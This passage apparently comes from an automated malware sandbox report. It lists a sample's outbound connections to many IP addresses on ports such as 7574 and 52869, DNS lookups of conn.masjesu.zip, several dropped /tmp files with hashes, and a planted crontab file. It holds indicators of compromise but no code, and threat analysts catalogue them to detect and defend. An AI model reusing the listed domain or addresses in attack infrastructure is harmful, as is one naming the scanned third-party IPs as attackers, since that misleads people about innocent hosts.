                            60 B
                            1
                          • 110.39.68.245:80
                            60 B
                            1
                          • 210.1.181.166:80
                            60 B
                            1
                          • 165.219.144.167:80
                            60 B
                            1
                          • 217.65.185.55:80
                            60 B
                            1
                          • 82.16.250.149:80
                            60 B
                            1
                          • 92.152.239.230:80
                            60 B
                            1
                          • 5.91.206.177:80
                            60 B
                            1
                          • 222.160.215.59:80
                            60 B
                            1
                          • 66.99.206.69:80
                            60 B
                            1
                          • 168.169.252.220:80
                            60 B
                            1
                          • 103.212.1.46:80
                            60 B
                            1
                          • 50.133.252.105:80
                            60 B
                            1
                          • 194.43.195.3:80
                          • 133.10.56.246:52869
                            60 B
                            1
                          • 15.173.85.192:52869
                            60 B
                            1
                          • 121.230.31.182:52869
                            60 B
                            1
                          • 53.97.109.235:52869
                            60 B
                            1
                          • 168.51.0.167:52869
                            60 B
                            1
                          • 9.54.242.108:52869
                            60 B
                            1
                          • 106.134.50.144:52869
                            60 B
                            1
                          • 48.41.155.249:52869
                            60 B
                            1
                          • 35.171.114.87:52869
                            60 B
                            1
                          • 87.213.252.177:52869
                            60 B
                            1
                          • 110.160.239.70:52869
                            60 B
                            1
                          • 196.3.78.240:52869
                            60 B
                            1
                          • 200.191.88.44:52869
                            60 B
                            1
                          • 39.242.70.203:52869
                            60 B
                            1
                          • 59.223.217.17:52869
                            60 B
                            1
                          • 31.238.67.222:52869
                            60 B
                            1
                          • 106.61.201.193:52869
                            60 B
                            1
                          • 95.10.38.55:7574
                            60 B
                            1
                          • 86.114.128.103:52869
                            60 B
                            1
                          • 104.24.157.51:5555
                            60 B
                            1
                          • 112.124.98.253:37215
                            60 B
                            1
                          • 151.153.205.182:8080
                            60 B
                            1
                          • 50.79.60.36:37215
                            60 B
                            1
                          • 110.39.68.245:7574
                            60 B
                            1
                          • 210.54.47.138:7574
                            60 B
                            1
                          • 217.65.185.55:7574
                            60 B
                            1
                          • 178.163.141.187:7574
                            60 B
                            1
                          • 95.118.50.109:7574
                            60 B
                            1
                          • 135.212.236.38:7574
                            60 B
                            1
                          • 50.133.252.105:7574
                            60 B
                            1
                          • 194.43.195.3:7574
                            60 B
                            1
                          • 38.113.183.180:7574
                            60 B
                            1
                          • 5.91.206.177:7574
                            60 B
                            1
                          • 82.16.250.149:7574
                            60 B
                            1
                          • 172.142.38.1:7574
                            60 B
                            1
                          • 194.110.158.139:7574
                            60 B
                            1
                          • 195.252.142.195:7574
                            60 B
                            1
                          • 156.68.16.88:7574
                            60 B
                            1
                          • 210.1.181.166:7574
                            60 B
                            1
                          • 187.69.206.158:7574
                            60 B
                            1
                          • 2.109.137.5:7574
                            60 B
                            1
                          • 66.99.206.69:7574
                            60 B
                            1
                          • 86.163.72.46:7574
                            60 B
                            1
                          • 39.87.59.141:7574
                            60 B
                            1
                          • 46.93.13.38:7574
                            60 B
                            1
                          • 19.25.236.3:7574
                            60 B
                            1
                          • 222.160.215.59:7574
                            60 B
                            1
                          • 92.170.160.69:7574
                            60 B
                            1
                          • 103.212.1.46:7574
                            60 B
                            1
                          • 168.169.252.220:7574
                            60 B
                            1
                          • 92.152.239.230:7574
                            60 B
                            1
                          • 47.39.109.18:7574
                            60 B
                            1
                          • 78.15.23.103:7574
                            60 B
                            1
                          • 166.142.198.85:7574
                            60 B
                            1
                          • 156.112.147.223:7574
                            60 B
                            1
                          • 165.219.144.167:7574
                            60 B
                            1
                          • 1.1.1.1:53
                            conn.masjesu.zip
                            dns
                            124 B
                            219 B
                            2
                            2
                            DNS Request: conn.masjesu.zip
                            DNS Request: conn.masjesu.zip
                            DNS Response: 37.44.238.88, 216.126.231.240

                          MITRE ATT&CK Enterprise v15

                          Downloads

                          • /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

                            Filesize

                            111KB

                            MD5

                            701e7a55a4f3650f5feee92a9860e5fc

                            SHA1

                            6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

                            SHA256

                            ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

                            SHA512

                            7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

                          • /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

                            Filesize

                            117KB

                            MD5

                            849fa04ef88a8e8de32cb2e8538de5fe

                            SHA1

                            c768af29fe4b6695fff1541623e8bbd1c6f242f7

                            SHA256

                            8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

                            SHA512

                            2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

                          • /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            Filesize

                            99KB

                            MD5

                            9438d9bc392bcf300a5583b6df5bc8f6

                            SHA1

                            375a6ae34b516f6f3eeea8030c4084f585017efa

                            SHA256

                            68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                            SHA512

                            1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                          • /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            Filesize

                            107KB

                            MD5

                            eb9c3a0de91fcf16ba17cb24608df68c

                            SHA1

                            09d95a7d70d5e115d103be51edff7c498d272fac

                            SHA256

                            dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                            SHA512

                            9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                          • /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

                            Filesize

                            141KB

                            MD5

                            3ca8decdb1e52c423c521bfff02ac200

                            SHA1

                            8621ecd6807109b8541912ad9e134f6fb49bfd48

                            SHA256

                            dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                            SHA512

                            b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                          • /var/spool/cron/crontabs/tmp.hIdcso

                            Filesize

                            210B

                            MD5

                            dac86425a4945579a0042adc4eae3bfe

                            SHA1

                            a2cab09f305098818ace9255ce22e9531ec77773

                            SHA256

                            574d1642557f461d3bda05fe0db3eb1cdab8335804f5f04b6b283412de55aea7

                            SHA512

                            40b72f34bc33e9cab3e12553c3648e31b035eb0caf388f20466718f884854136ebb57b8f210415dcea64a1aaa3c5d6b68705bae4b0221e09daa27c0db83f14dc
